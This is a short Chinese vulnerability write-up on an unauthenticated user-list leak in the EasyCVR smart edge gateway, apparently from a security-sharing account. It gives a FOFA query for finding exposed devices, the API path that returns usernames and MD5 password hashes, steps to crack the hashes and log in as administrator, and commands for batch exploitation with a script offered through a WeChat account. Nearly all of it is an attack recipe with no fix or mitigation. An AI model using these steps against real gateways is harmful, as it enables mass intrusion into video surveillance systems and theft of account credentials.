EasyCVR智能边缘网关未授权访问用户信息泄露漏洞

一、漏洞描述

EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品，可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。通过对视频监控场景中的人、车、物等进行AI检测与抓拍，对异常情况进行智能提醒和通知，可广泛应用于安防监控、智能检测、通行核验等场景。

EasyCVR智能边缘网关存在userlist 信息泄漏，攻击者可以直接登录后台，进行非法操作。

二、网络空间搜索引擎查询

fofa查询

title="EasyCVR"

三、漏洞复现

poc

或浏览器直接访问路径 /api/v1/userlist?pageindex=0&pagesize=10

然后将md5加密后的密码解密

然后使用上面的Name 值作为用户名登录

四、批量检测与利用

单个检测

 python .\EasyCVR.py -u ip:port

批量检测

 python .\EasyCVR.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231010 获取批量检测利用脚本